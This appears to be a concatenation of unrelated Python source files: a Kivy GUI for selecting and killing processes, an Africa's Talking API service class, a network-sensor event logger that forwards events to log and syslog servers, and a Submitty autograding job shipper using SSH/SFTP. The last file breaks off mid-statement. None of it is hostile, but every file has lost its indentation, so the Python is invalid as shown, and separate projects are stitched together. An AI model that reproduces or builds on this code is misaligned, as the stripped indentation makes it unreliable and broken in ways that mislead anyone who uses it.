super().__init__(**kwargs)
self.selection_lock = Lock()
# each entry: [search text (str), general checkbox clicked (bool), added PIDs (set), unmarked PIDs (set)]
self.selection_control = []
self.navigator = Navigator()
self.main = Main()
self.navigator.ids.sm.add_widget(self.main)
self.theme_cls.theme_style = "Dark" if self.dark else "Light"
def update_config(self, key, value):
from json import dump
self.killer_config[key] = value
with open(self.killer_config_file, "w") as write_file:
dump(self.killer_config, write_file)
def build(self):
return self.navigator
def on_start(self):
self.main.first_update_data()
from kivy.clock import Clock
Clock.schedule_once(self.search_focus)
Thread(target=self.main.always_updating_data, daemon=True).start()
Thread(target=self.main.always_setting_visible_range, daemon=True).start()
Thread(target=always_updating_processes, daemon=True).start()
Thread(target=self.always_selecting, daemon=True).start()
def check_for_updates(self, state):
if state == "open":
Thread(target=self.check_for_updates_base).start()
def check_for_updates_base(self):
if self.version is None:
from utils import proc_version_tag, this_pid # noqa
self.version = proc_version_tag(processes[this_pid])
if self.version is not None:
from utils import update_to # noqa
self.update = update_to(self.version, 'ntaraujo', 'killer')
def search_focus(*args):
args[0].main.ids.search_field.focus = True
def always_selecting(self):
while True:
if len(self.main.ids.rv.data) == 0:
self.main.set_multiple_select(False)
sleep(1)
continue
state = True
self.selection_lock.acquire()
self.main.data_lock.acquire()
for cell in self.main.ids.rv.data:
if cell["proc_pid"] not in self.current_selection:
state = False
break
self.main.data_lock.release()
self.main.set_multiple_select(state)
self.selection_lock.release()
sleep(1)
def update_selection_label(self):
selection_strings = []
lonely_ones = []
searches = []
exceptions = []
# _search: what was the search when general checkbox was clicked, or empty if it wasn't clicked
# _check: if general checkbox was clicked
# _added: related PIDs
# _removed: related PIDs but unmarked
for _search, _check, _added, _removed in self.selection_control:
if _check:
searches.append(_search)
for pid in _removed:
if pid not in exceptions:
exceptions.append(pid)
else:
for one_pid in _added:
lonely_ones.append(one_pid)
lonely_ones_amount = len(lonely_ones)
if lonely_ones_amount:
lonely_ones = sorted(lonely_ones)
last_lonely = lonely_ones[-1]
if lonely_ones_amount == 1:
selection_strings.append(f'process {last_lonely}')
else:
lonely_string = "processes " + ', '.join([str(lo) for lo in lonely_ones])
lonely_string = lonely_string.replace(f', {last_lonely}', f' and {last_lonely}')
selection_strings.append(lonely_string)
searches_amount = len(searches)
if searches_amount:
searches = sorted(searches)
last_search = searches[-1]
if searches_amount == 1:
if last_search == "":
selection_strings.append("all")
else:
selection_strings.append(f'all with "{last_search}"')
else:
search_string = 'all with "{}"'.format('" or "'.join(searches))
selection_strings.append(search_string)
exceptions_amount = len(exceptions)
if exceptions_amount:
exceptions = sorted(exceptions)
last_exception = exceptions[-1]
if exceptions_amount == 1:
selection_strings.append(f"except process {last_exception}")
else:
exception_string = 'except processes ' + ', '.join([str(ex) for ex in exceptions])
exception_string = exception_string.replace(f', {last_exception}', f' and {last_exception}')
selection_strings.append(exception_string)
if selection_strings:
self.main.ids.selection_label.text = f'Selected: {"; ".join(selection_strings)} '
else:
self.main.ids.selection_label.text = ''
def select_row(self, pid, active, instance=None, label=True):
if active and pid not in self.current_selection:
self.current_selection.append(pid)
changed = False
for _search, _check, _added, _removed in self.selection_control:
if pid in _removed:
# pid was related to a search before and was unmarked, now its being remarked
_removed.remove(pid)
changed = True
if not changed: # pid was not related to a previous search
self.selection_control.append(["", False, {pid}, set()]) # _search is "" bcs doesn't matter
elif not active and pid in self.current_selection:
self.current_selection.remove(pid)
for _search, _check, _added, _removed in [*self.selection_control]:
if pid in _added:
_removed.add(pid)
if not _added - _removed:
# all related PIDs were unmarked, so _check no longer matters
# the set _removed is still the same object (no deepcopy was made), so:
self.selection_control.remove([_search, _check, _added, _removed])
else:
return
if instance is not None:
instance.check_anim_in.cancel(instance)
instance.check_anim_out.start(instance)
if label:
self.update_selection_label()
def select_rows(self, active):
if active:
pids = set()
self.main.data_lock.acquire()
for cell in self.main.ids.rv.data:
pid = cell['proc_pid']
if pid not in self.current_selection:
self.current_selection.append(pid)
pids.add(pid)
self.main.data_lock.release()
search = self.main.ids.search_field.text.lower()
need_to_add = True
for _search, _check, _added, _removed in [*self.selection_control]:
# selected all,
# or selected a group that includes all of _added because _search was at least as specific
surely_include_all = not search or (_check and search in _search)
# or every PID of a lonely (individually selected) entry is now covered
iter_include_all = surely_include_all or (not _check and not _added.difference(pids))
if iter_include_all:
self.selection_control.remove([_search, _check, _added, _removed])
elif _removed:
# if there was exceptions
for pid in pids:
if pid in _removed:
# if a marked pid was in these exceptions
_removed.remove(pid)
if _check and _search in search and not iter_include_all:
# if a previous search was less specific than, or as specific as now,
# and was not removed, it includes all PIDs and there is no need to be redundant
need_to_add = False
if need_to_add:
self.selection_control.append([search, True, pids, set()])
else:
self.current_selection = []
self.selection_control = []
self.update_selection_label()
def kill_selected(self):
from utils import kill # noqa
fails = []
with processes_lock:
for pid in self.current_selection:
proc = processes[pid]
if not kill(proc):
fails.append(proc)
self.show_fails(fails)
def kill_selected_and_children(self):
from utils import kill_proc_tree # noqa
fails = []
with processes_lock:
for pid in self.current_selection:
fails.extend(kill_proc_tree(processes[pid]))
self.show_fails(fails)
@mainthread
def show_fails(self, fails):
if len(fails) == 0:
return
items = []
cell = MiniProcessCell()
cell.proc_name = "Process Name"
cell.proc_pid = "PID"
cell.proc_user = "Owner"
items.append(cell)
for proc in fails:
cell = MiniProcessCell()
cell.proc_name = proc.info["name"]
cell.proc_icon = icon_path('', cell.proc_name)
cell.proc_pid = str(proc.pid)
cell.little_font = dp(10)
try:
cell.proc_user = proc.username()
except AccessDenied:
pass
except NoSuchProcess:
continue
finally:
items.append(cell)
leni = len(items)
if leni == 1:
return
if leni > 2:
title = "It was not possible to kill the following processes:"
else:
title = "It was not possible to kill the following process:"
from kivymd.uix.dialog import MDDialog
from kivymd.uix.button import MDRaisedButton
fails_dialog = MDDialog(
title=title,
items=items,
type="simple",
buttons=[MDRaisedButton(text="OK")]
)
fails_dialog.ids.title.color = self.theme_cls.opposite_bg_normal
fails_dialog.open()
app = Killer()
if __name__ == '__main__':
app.run()
|
Service.py
|
import re
import threading
import requests
def validate_currency(currency_str):
return len(currency_str) == 3
def validate_amount(amount_str):
try:
return float(amount_str)
except ValueError:
return False
def validate_phone(phone_str):
try:
return re.match(r'^\+\d{1,3}\d{3,}$', phone_str)
except ValueError:
return False
def validate_keys(test_dict, valid_keys_set):
if set(test_dict.keys()) == valid_keys_set:
return True
return False
class AfricasTalkingException(Exception):
pass
class Service(object):
def __init__(self, username, api_key):
if type(username) is not str:
raise RuntimeError('username has to be of type str.')
if type(api_key) is not str:
raise RuntimeError('api_key has to be of type str.')
self._PRODUCTION_DOMAIN = 'africastalking.com'
self._SANDBOX_DOMAIN = 'sandbox.africastalking.com'
self._username = username
self._api_key = api_key
self._headers = {
'Accept': 'application/json',
'User-Agent': 'africastalking-python/2.0.0',
'ApiKey': self._api_key
}
self._baseUrl = 'https://api.' + self._PRODUCTION_DOMAIN
self._init_service()
def _is_sandbox(self):
return self._username == 'sandbox'
def _make_url(self, path):
return self._baseUrl + path
def _init_service(self):
raise NotImplementedError
@staticmethod
def __make_get_request(url, headers, data, params, callback=None):
res = requests.get(
url=url,
headers=headers,
params=params,
data=data
)
if callback is None or callback == {}:
return res
else:
callback(res)
@staticmethod
def __make_post_request(url, headers, data, params, callback=None):
res = requests.post(
url=url,
headers=headers,
params=params,
data=data,
)
if callback is None or callback == {}:
return res
else:
callback(res)
def _make_request(self, url, method, headers, data, params, callback=None):
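# Synchronous when no callback is given: perform the request and return the
# parsed JSON (or raw text), raising AfricasTalkingException on a non-2xx
# status. When a callable callback is given, run the request in a background
# thread, invoke callback(error, data) when done and return the Thread object.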
method = method.upper()
if callback is None:
if method == 'GET':
res = self.__make_get_request(url=url, headers=headers, data=data, params=params)
elif method == 'POST':
res = self.__make_post_request(url=url, headers=headers, data=data, params=params)
else:
raise AfricasTalkingException('Unexpected HTTP method: ' + method)
if 200 <= res.status_code < 300:
if res.headers.get('content-type') == 'application/json':
return res.json()
else:
return res.text
else:
raise AfricasTalkingException(res.text)
elif not callable(callback):
raise RuntimeError('callback has to be callable. e.g. a function')
else:
def cb(response):
if 200 <= response.status_code < 300:
if response.headers.get('content-type') == 'application/json':
callback(None, response.json())
else:
callback(None, response.text)
else:
callback(AfricasTalkingException(response.text), None)
if method == 'GET':
_target = self.__make_get_request
elif method == 'POST':
_target = self.__make_post_request
else:
raise AfricasTalkingException('Unexpected HTTP method: ' + method)
thread = threading.Thread(target=_target, args=(url, headers, data, params, cb))
thread.start()
return thread
class APIService(Service):
def __init__(self, username, api_key):
super(APIService, self).__init__(username, api_key)
def _init_service(self):
self._baseUrl = 'https://api.'
if self._is_sandbox():
self._baseUrl += self._SANDBOX_DOMAIN
else:
self._baseUrl += self._PRODUCTION_DOMAIN
|
log.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import os
import signal
import socket
import SocketServer
import sys
import threading
import time
import traceback
from core.common import check_whitelisted
from core.common import check_sudo
from core.enums import TRAIL
from core.settings import CEF_FORMAT
from core.settings import config
from core.settings import CONDENSE_ON_INFO_KEYWORDS
from core.settings import CONDENSED_EVENTS_FLUSH_PERIOD
from core.settings import DEFAULT_ERROR_LOG_PERMISSIONS
from core.settings import DEFAULT_EVENT_LOG_PERMISSIONS
from core.settings import HOSTNAME
from core.settings import NAME
from core.settings import TIME_FORMAT
from core.settings import TRAILS_FILE
from core.settings import VERSION
from core.ignore import ignore_event
_condensed_events = {}
_condensing_thread = None
_condensing_lock = threading.Lock()
_thread_data = threading.local()
def create_log_directory():
if not os.path.isdir(config.LOG_DIR):
if check_sudo() is False:
exit("[!] please rerun with sudo/Administrator privileges")
os.makedirs(config.LOG_DIR, 0755)
print("[i] using '%s' for log storage" % config.LOG_DIR)
def get_event_log_handle(sec, flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY, reuse=True):
retval = None
localtime = time.localtime(sec)
_ = os.path.join(config.LOG_DIR, "%d-%02d-%02d.log" % (localtime.tm_year, localtime.tm_mon, localtime.tm_mday))
if not reuse:
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
retval = os.open(_, flags)
else:
if _ != getattr(_thread_data, "event_log_path", None):
if getattr(_thread_data, "event_log_handle", None):
try:
os.close(_thread_data.event_log_handle)
except OSError:
pass
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_EVENT_LOG_PERMISSIONS)
_thread_data.event_log_path = _
_thread_data.event_log_handle = os.open(_thread_data.event_log_path, flags)
retval = _thread_data.event_log_handle
return retval
def get_error_log_handle(flags=os.O_APPEND | os.O_CREAT | os.O_WRONLY):
if not hasattr(_thread_data, "error_log_handle"):
_ = os.path.join(config.LOG_DIR, "error.log")
if not os.path.exists(_):
open(_, "w+").close()
os.chmod(_, DEFAULT_ERROR_LOG_PERMISSIONS)
_thread_data.error_log_path = _
_thread_data.error_log_handle = os.open(_thread_data.error_log_path, flags)
return _thread_data.error_log_handle
def safe_value(value):
retval = str(value or '-')
if any(_ in retval for _ in (' ', '"')):
retval = "\"%s\"" % retval.replace('"', '""')
return retval
def flush_condensed_events():
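# Background loop: every CONDENSED_EVENTS_FLUSH_PERIOD seconds, merge buffered
# events that share the same (src_ip, trail) key, collapsing differing
# src_port/dst_ip/dst_port/proto values into comma-separated lists, then log
# each merged event and clear the buffer.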
while True:
time.sleep(CONDENSED_EVENTS_FLUSH_PERIOD)
with _condensing_lock:
for key in _condensed_events:
condensed = False
events = _condensed_events[key]
first_event = events[0]
condensed_event = [_ for _ in first_event]
for i in xrange(1, len(events)):
current_event = events[i]
for j in xrange(3, 7): # src_port, dst_ip, dst_port, proto
if current_event[j] != condensed_event[j]:
condensed = True
if not isinstance(condensed_event[j], set):
condensed_event[j] = set((condensed_event[j],))
condensed_event[j].add(current_event[j])
if condensed:
for i in xrange(len(condensed_event)):
if isinstance(condensed_event[i], set):
condensed_event[i] = ','.join(str(_) for _ in sorted(condensed_event[i]))
log_event(condensed_event, skip_condensing=True)
_condensed_events.clear()
def log_event(event_tuple, packet=None, skip_write=False, skip_condensing=False):
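# Write one event: skip ignored/whitelisted traffic, optionally buffer noisy
# events for condensing, throttle duplicate (ip, trail) pairs per time bucket,
# append to the daily log file and/or forward to the remote log server and
# syslog (CEF), and finally hand the event to any configured plugins.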
global _condensing_thread
if _condensing_thread is None:
_condensing_thread = threading.Thread(target=flush_condensed_events)
_condensing_thread.daemon = True
_condensing_thread.start()
try:
sec, usec, src_ip, src_port, dst_ip, dst_port, proto, trail_type, trail, info, reference = event_tuple
if ignore_event(event_tuple):
return
if not (any(check_whitelisted(_) for _ in (src_ip, dst_ip)) and trail_type != TRAIL.DNS): # DNS requests/responses can't be whitelisted based on src_ip/dst_ip
if not skip_write:
localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
if not skip_condensing:
if any(_ in info for _ in CONDENSE_ON_INFO_KEYWORDS):
with _condensing_lock:
key = (src_ip, trail)
if key not in _condensed_events:
_condensed_events[key] = []
_condensed_events[key].append(event_tuple)
return
current_bucket = sec / config.PROCESS_COUNT
if getattr(_thread_data, "log_bucket", None) != current_bucket: # log throttling
_thread_data.log_bucket = current_bucket
_thread_data.log_trails = set()
else:
if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event)
if config.LOG_SERVER:
remote_host, remote_port = config.LOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port)))
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_, (remote_host, int(remote_port)))
if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg):
try:
handle = get_error_log_handle()
os.write(handle, "%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
class UDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
sec, event = data.split(" ", 1)
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
server = ThreadingUDPServer((address, port), UDPHandler)
print "[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1])
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
submitty_autograding_shipper.py
|
#!/usr/bin/env python3
import os
import time
import signal
import json
import shutil
import contextlib
import datetime
import multiprocessing
from pathlib import Path
from submitty_utils import dateutils
import operator
import paramiko
import tempfile
import socket
import traceback
import subprocess
from autograder import autograding_utils
from autograder import packer_unpacker
CONFIG_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'config')
with open(os.path.join(CONFIG_PATH, 'submitty.json')) as open_file:
OPEN_JSON = json.load(open_file)
SUBMITTY_DATA_DIR = OPEN_JSON['submitty_data_dir']
SUBMITTY_INSTALL_DIR = OPEN_JSON['submitty_install_dir']
AUTOGRADING_LOG_PATH = OPEN_JSON['autograding_log_path']
AUTOGRADING_STACKTRACE_PATH = os.path.join(OPEN_JSON['site_log_path'], 'autograding_stack_traces')
with open(os.path.join(CONFIG_PATH, 'submitty_users.json')) as open_file:
OPEN_JSON = json.load(open_file)
DAEMON_UID = OPEN_JSON['daemon_uid']
INTERACTIVE_QUEUE = os.path.join(SUBMITTY_DATA_DIR, "to_be_graded_queue")
JOB_ID = '~SHIP~'
# ==================================================================================
def initialize(untrusted_queue):
"""
Initializer function for all our processes. We get one untrusted user off our queue and
assign it to this Process. We cannot recycle the shipper process, or else the untrusted
user assigned to this process would be lost.
:param untrusted_queue: multiprocessing.queues.Queue that contains all untrusted users left to
assign
"""
multiprocessing.current_process().untrusted = untrusted_queue.get()
# ==================================================================================
def add_fields_to_autograding_worker_json(autograding_worker_json, entry):
submitty_config = os.path.join(SUBMITTY_INSTALL_DIR, 'config', 'version.json')
try:
with open(submitty_config) as infile:
submitty_details = json.load(infile)
installed_commit = submitty_details['installed_commit']
most_recent_tag = submitty_details['most_recent_git_tag']
except FileNotFoundError as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())
raise SystemExit("ERROR, could not locate the submitty.json:", e)
autograding_worker_json[entry]['server_name'] = socket.getfqdn()
autograding_worker_json[entry]['primary_commit'] = installed_commit
autograding_worker_json[entry]['most_recent_tag'] = most_recent_tag
return autograding_worker_json
# ==================================================================================
def update_all_foreign_autograding_workers():
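# Push an updated autograding_worker.json to every enabled worker listed in
# autograding_workers.json; returns a map of worker name -> success boolean.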
success_map = dict()
all_workers_json = os.path.join(SUBMITTY_INSTALL_DIR, 'config', "autograding_workers.json")
try:
with open(all_workers_json, 'r') as infile:
autograding_workers = json.load(infile)
except FileNotFoundError as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())
raise SystemExit("ERROR, could not locate autograding_workers_json :", e)
for key, value in autograding_workers.items():
if value['enabled'] == False:
continue
formatted_entry = {key: value}
formatted_entry = add_fields_to_autograding_worker_json(formatted_entry, key)
success = update_worker_json(key, formatted_entry)
success_map[key] = success
return success_map
# ==================================================================================
# Updates the autograding_worker.json in a worker's autograding_TODO folder
# (tells it how many threads to run on startup).
def update_worker_json(name, entry):
fd, tmp_json_path = tempfile.mkstemp()
foreign_json = os.path.join(SUBMITTY_DATA_DIR, "autograding_TODO", "autograding_worker.json")
autograding_worker_to_ship = entry
try:
user = autograding_worker_to_ship[name]['username']
host = autograding_worker_to_ship[name]['address']
except Exception as e:
print("ERROR: autograding_workers.json entry for {0} is malformatted. {1}".format(e, name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: autograding_workers.json entry for {0} is malformed. {1}".format(e, name))
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
return False
#create a new temporary json with only the entry for the current machine.
with open(tmp_json_path, 'w') as outfile:
json.dump(autograding_worker_to_ship, outfile, sort_keys=True, indent=4)
#if we are updating the current machine, we can just move the new json to the appropriate spot (no ssh needed)
if host == "localhost":
try:
shutil.move(tmp_json_path,foreign_json)
print("Successfully updated local autograding_TODO/autograding_worker.json")
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully updated local autograding_TODO/autograding_worker.json")
return True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not mv to local autograding_TODO/autograding_worker.json due to the following error: "+str(e))
print("ERROR: could not mv to local autograding_worker.json due to the following error: {0}".format(e))
return False
finally:
os.close(fd)
#if we are updating a foreign machine, we must connect via ssh and use sftp to update it.
else:
#try to establish an ssh connection to the host
try:
ssh = establish_ssh_connection(None, user, host, only_try_once = True)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))
print("ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))
return False
#try to copy the files over to the host
try:
sftp = ssh.open_sftp()
sftp.put(tmp_json_path,foreign_json)
sftp.close()
print("Successfully forwarded autograding_worker.json to {0}".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully forwarded autograding_worker.json to {0}".format(name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: "+str(e))
print("ERROR: could sftp to foreign autograding_TODO/autograding_worker.json due to the following error: {0}".format(e))
success = False
finally:
os.close(fd)
os.remove(tmp_json_path)
sftp.close()
ssh.close()
return success
def establish_ssh_connection(my_name, user, host, only_try_once = False):
"""
Returns a connected paramiko ssh session.
    Retries until a connection is established. If only_try_once is True, the
    first connection error is re-raised instead of retrying.
"""
connected = False
ssh = None
retry_delay = .1
while not connected:
ssh = paramiko.SSHClient()
ssh.get_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, username = user, timeout=10)
connected = True
except:
if only_try_once:
raise
time.sleep(retry_delay)
            retry_delay = min(10, retry_delay * 2)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=f"{my_name} Could not establish connection with {user}@{host} going to re-try.")
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
return ssh
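# Editor's sketch (hypothetical helper, not called anywhere): the retry delay
# above doubles after every failed attempt and is capped at 10 seconds; this
# just shows the resulting sequence of sleeps for a given number of failures.
def _example_ssh_backoff_delays(failures=6, initial=0.1, cap=10):
    delays = []
    delay = initial
    for _ in range(failures):
        delays.append(delay)
        delay = min(cap, delay * 2)
    return delays  # [0.1, 0.2, 0.4, 0.8, 1.6, 3.2]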
# ==================================================================================
def prepare_job(my_name,which_machine,which_untrusted,next_directory,next_to_grade):
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: must be run by DAEMON_USER")
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
# prepare the zip files
try:
autograding_zip_tmp,submission_zip_tmp = packer_unpacker.prepare_autograding_and_submission_zip(which_machine,which_untrusted,next_directory,next_to_grade)
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name, address)
autograding_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_autograding.zip")
submission_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_submission.zip")
todo_queue_file = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_queue.json")
with open(next_to_grade, 'r') as infile:
queue_obj = json.load(infile)
queue_obj["which_untrusted"] = which_untrusted
queue_obj["which_machine"] = which_machine
queue_obj["ship_time"] = dateutils.write_submitty_date(microseconds=True)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: failed preparing submission zip or accessing next to grade "+str(e))
print("ERROR: failed preparing submission zip or accessing next to grade ", e)
return False
if address == "localhost":
try:
shutil.move(autograding_zip_tmp,autograding_zip)
shutil.move(submission_zip_tmp,submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not move files due to the following error: "+str(e))
print("ERROR: could not move files due to the following error: {0}".format(e))
return False
else:
sftp = ssh = None
try:
user, host = which_machine.split("@")
ssh = establish_ssh_connection(my_name, user, host)
sftp = ssh.open_sftp()
sftp.put(autograding_zip_tmp,autograding_zip)
sftp.put(submission_zip_tmp,submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
sftp.put(todo_queue_file, todo_queue_file)
os.remove(todo_queue_file)
print("Successfully forwarded files to {0}".format(my_name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not move files due to the following error: "+str(e))
print("Could not move files due to the following error: {0}".format(e))
success = False
finally:
if sftp:
sftp.close()
if ssh:
ssh.close()
os.remove(autograding_zip_tmp)
os.remove(submission_zip_tmp)
return success
# log completion of job preparation
obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)
if "generate_output" not in obj:
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
item_name = os.path.join(obj["semester"],obj["course"],"submissions",partial_path)
elif obj["generate_output"]:
item_name = os.path.join(obj["semester"],obj["course"],"generated_output",obj["gradeable"])
is_batch = "regrade" in obj and obj["regrade"]
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted,
is_batch=is_batch, message="Prepared job for " + which_machine)
return True
# ==================================================================================
# ==================================================================================
def unpack_job(which_machine,which_untrusted,next_directory,next_to_grade):
# variables needed for logging
obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)
if "generate_output" not in obj:
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
item_name = os.path.join(obj["semester"],obj["course"],"submissions",partial_path)
elif obj["generate_output"]:
item_name = os.path.join(obj["semester"],obj["course"],"generated_output")
is_batch = "regrade" in obj and obj["regrade"]
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: must be run by DAEMON_USER")
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name, address)
target_results_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_DONE",servername_workername+"_"+which_untrusted+"_results.zip")
target_done_queue_file = os.path.join(SUBMITTY_DATA_DIR,"autograding_DONE",servername_workername+"_"+which_untrusted+"_queue.json")
if which_machine == "localhost":
if not os.path.exists(target_done_queue_file):
return False
else:
local_done_queue_file = target_done_queue_file
local_results_zip = target_results_zip
else:
ssh = sftp = fd1 = fd2 = local_done_queue_file = local_results_zip = None
try:
user, host = which_machine.split("@")
ssh = establish_ssh_connection(which_machine, user, host)
sftp = ssh.open_sftp()
fd1, local_done_queue_file = tempfile.mkstemp()
fd2, local_results_zip = tempfile.mkstemp()
#remote path first, then local.
sftp.get(target_done_queue_file, local_done_queue_file)
sftp.get(target_results_zip, local_results_zip)
            #Because get works like cp rather than mv, we have to clean up.
sftp.remove(target_done_queue_file)
sftp.remove(target_results_zip)
success = True
#This is the normal case (still grading on the other end) so we don't need to print anything.
except (socket.timeout, TimeoutError) as e:
success = False
except FileNotFoundError:
# Remove results files
for var in [local_results_zip, local_done_queue_file]:
if var:
with contextlib.suppress(FileNotFoundError):
os.remove(var)
success = False
#In this more general case, we do want to print what the error was.
#TODO catch other types of exception as we identify them.
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: Could not retrieve the file from the foreign machine "+str(e))
print("ERROR: Could not retrieve the file from the foreign machine.\nERROR: {0}".format(e))
# Remove results files
for var in [local_results_zip, local_done_queue_file]:
if var:
with contextlib.suppress(FileNotFoundError):
os.remove(var)
success = False
finally:
# Close SSH connections
for var in [sftp, ssh]:
if var:
var.close()
# Close file descriptors
for var in [fd1, fd2]:
if var:
try:
os.close(var)
except Exception:
pass
if not success:
return False
# archive the results of grading
try:
success = packer_unpacker.unpack_grading_results_zip(which_machine,which_untrusted,local_results_zip)
except:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID,jobname=item_name,message="ERROR: Exception when unpacking zip. For more details, see traces entry.")
with contextlib.suppress(FileNotFoundError):
